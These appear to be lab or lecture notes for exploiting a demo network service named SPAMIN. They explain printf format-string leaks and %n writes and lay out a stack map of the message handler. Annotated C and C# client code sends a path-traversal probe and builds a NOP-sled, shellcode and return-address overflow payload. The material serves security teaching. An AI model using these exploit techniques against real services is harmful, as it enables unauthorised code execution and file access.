SPAMIN Binary Hacking
Tools IDA + Hex Rays hexeditor WinSCP Putty telnet Visual Studio Wireshark (Optional)
Do not pirate IDA — hex-rays.com/idapro/hallofshame.html (Hex-Rays publishes the names attached to pirated copies).
Begin demo: SSH into the box and browse the service — `netstat -anp` to find the listening process and port, `telnet` to it and observe the protocol, then attempt the exploit. Optional: reverse engineer the binary further, exploit more, then patch.
printf format string attack. int printf(const char *format, ...); Safe uses, where the format is a literal and the conversions match the arguments: printf("%s", str1); printf("%s, %x, %x, %x", str1, x, y, z); Stack picture for printf("%x %x %x", 1, 2, 3): the format pointer "%x %x %x" is pushed last, above it the arguments 1 2 3, and each %x consumes the next word up the stack. Vulnerable use: gets(str1); printf(str1); — the input itself becomes the format string, so every %x the attacker includes reads one more word of the caller's stack (this is the address leak used later to find the buffer offset); gets is also unbounded and was removed in C11. %n: the number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument; no argument is converted — so with an attacker-controlled format the same mechanism turns from a read into a write through whatever stack word %n lands on.
// C#
// Minimal raw client for the SPAMIN service: connect, send the banner, then one request line.
TcpClient client = new TcpClient(" ", 8008);    // " " is a placeholder host — fill in the target before running
StreamWriter streamWriter = new StreamWriter(client.GetStream());
streamWriter.Write("SPAM-IN-SPAM-OUT\n");           // 17-byte banner the service expects first (the C listings send the same bytes as `pass`)
streamWriter.Write("../public_html/fun.php \n");    // NOTE(review): a relative path containing ".." — the decompiled handler has filename/filedata/stream locals, so this looks like a path-traversal probe of whatever file the service opens; confirm against the binary
streamWriter.Write(" \n");
streamWriter.Flush();                                // NOTE(review): neither the writer nor the TcpClient is disposed; wrap both in using(...) outside a throwaway demo
Stack map of the message handler (low to high, offsets from the decompiled locals listing): format, file contents (filedata), filename — three buffers 0x200 bytes apart (0x200 0x200 0x200) — then the remaining locals up to 0x62C (the FILE *stream slot), and above that the saved frame and caller frames from 0xbffff178 … 0xbfffffff ("stuff").
Gets Shell Code secure.com/endymion/shellcodes/archive/linux -x86-mkdir1.c secure.com/endymion/shellcodes/archive/linux -x86-mkdir1.c NOP Shell Code RA bufferbuffer
/* Header name lost in extraction: WSAStartup/WSADATA/socket/inet_addr need <winsock2.h> on Windows — TODO confirm */
#include
int sock;                       /* Socket descriptor */
struct sockaddr_in mySockAddr;  /* server address */
WSADATA wsaData;                /* Structure for WinSock setup communication */
if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0) /* Load Winsock 2.0 DLL */
{
    fprintf(stderr, "WSAStartup() failed");
    exit(1);
}
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);   /* NOTE(review): result not checked (INVALID_SOCKET on failure) */
memset(&mySockAddr, 0, sizeof(mySockAddr));
mySockAddr.sin_family = AF_INET;
mySockAddr.sin_addr.s_addr = inet_addr(" ");        /* placeholder: " " is not a dotted quad, inet_addr() returns INADDR_NONE — fill in the target */
mySockAddr.sin_port = htons(8008);
connect(sock, (struct sockaddr *) &mySockAddr, sizeof(mySockAddr));  /* NOTE(review): return value ignored; a refused connection still falls through to send() */
/* `pass` is not declared in this excerpt; the later listing defines it as "SPAM-IN-SPAM-OUT\n", whose 17 bytes match the length passed here */
send(sock,pass,17,0);
C# != C
Hex-Rays locals of the message handler (stack offsets relative to sp): unsigned __int8 isStringLess; // unsigned __int8 isStringEqual; // signed int v4; // int spamString2; // char *userInput1; // int result; // char v8; // [sp-10h] char v9; // [sp+0h] char *v10; // [sp+Ch] int v11; // [sp+10h] int spamString1; // [sp+14h] char *v13; // [sp+18h] __int16 v14; // [sp+1Ch] char format; // [sp+28h] char filedata; // [sp+228h] char filename; // [sp+428h] int v18; // [sp+628h] FILE *stream; // [sp+62Ch]. Stack map (low to high): format, file contents (filedata), filename — three buffers 0x200 apart (0x200 0x200 0x200) — then the other local function variables up to 0x62C, the saved register (prologue) ebp, and the return address (RA); above that the caller frames, process message then main, each with its own saved registers and RA, at 0xbffffb… up to 0xbfffffff. The slide also marks the printf parameters region, which is what the %x leak walks (printf "%x %x %x" 1 2 3 — the stack picture for printf("%x %x %x",1,2,3)). Because the buffers lie below the saved ebp/RA, an overflow writes upward: nop sled, shellcode, then the RA repeated until it covers the real return-address slot.
C# attack: the service forks (so attach the debugger to the child that handles the connection — inferred from the slide's "fork"). Use a remote gdbserver attached to the PID, with `gdb ./spamin` on the client side; then `x/1000w 0xbfffffff` to dump stack words — use the offset found in the printf attack. Caveat: gdb's x examines upward (increasing addresses), and 0xbfffffff is the top of the 32-bit user stack, so start the dump from a lower address (e.g. the leaked stack value) to actually see the frame. gdbserver demo.
int sock;                          /* Socket descriptor */
struct sockaddr_in mySockAddr;     /* Echo server address */
char *pass = "SPAM-IN-SPAM-OUT\n"; /* 17-byte banner the service expects before and after the request; matches the send(...,17,0) calls below */
char payload [2500];               /* nop sled + shellcode + repeated return address */
WSADATA wsaData;                   /* Structure for WinSock setup communication */
if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0) /* Load Winsock 2.0 DLL */
{
    fprintf(stderr, "WSAStartup() failed");
    exit(1);
}
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);   /* NOTE(review): result not checked */
memset(&mySockAddr, 0, sizeof(mySockAddr));
mySockAddr.sin_family = AF_INET;
mySockAddr.sin_addr.s_addr = inet_addr(" ");        /* placeholder: " " is not a dotted quad, inet_addr() returns INADDR_NONE — fill in the target */
mySockAddr.sin_port = htons(8008);
connect(sock, (struct sockaddr *) &mySockAddr, sizeof(mySockAddr));  /* NOTE(review): return value ignored; a failed connect still falls through to the send() calls */
int nopLength = 300;     /* sled size */
int length = 700;        /* bytes actually sent: only payload[0..699] ever reach the target */
memset(payload, '\x90', nopLength);  // Create the nop sled in the payload (0x90 = x86 NOP)
/* `sc` is defined outside this excerpt. sizeof(sc) is only the shellcode length if sc is a char array in scope
 * (not a pointer); presumably it is a string literal array, since the -1 below overlaps its trailing NUL. */
memcpy(&payload[nopLength],sc,sizeof(sc));  // Copy the shellcode into payload
/* Fill the rest with the guessed return address, little-endian 0xbffffb20 — inside the 0xbffffb… stack region
 * on the stack map, i.e. somewhere in the sled. It was found with the printf %x leak / gdb and must be
 * redetermined per target; any stack randomisation breaks it.
 * NOTE(review): j runs to 1496, so the last copy lands at payload[r+1499]; with r = 299 + sizeof(sc) that stays
 * inside the 2500-byte buffer only while sizeof(sc) <= 701, and everything past index 699 is never sent anyway
 * (length = 700). Bounding the loop by length - r would make both facts explicit. */
for (int j=0; j < 1500; j+= 4)  // Copy the RA into the payload
{
    int r = nopLength + sizeof(sc) -1;   /* start over the shellcode's trailing NUL */
    memcpy(&payload[r+j], "\x20\xfb\xff\xbf", 4);
}
payload[length-1] = '\n';   /* line terminator for the service's reader; it clobbers one byte of whichever RA copy ends at index 699 — harmless only if the RA slot actually hit lies earlier */
send(sock,pass,17,0);                 /* NOTE(review): send() results unchecked; a short send silently truncates the payload */
send(sock, payload, length, 0);
send(sock,pass,17,0);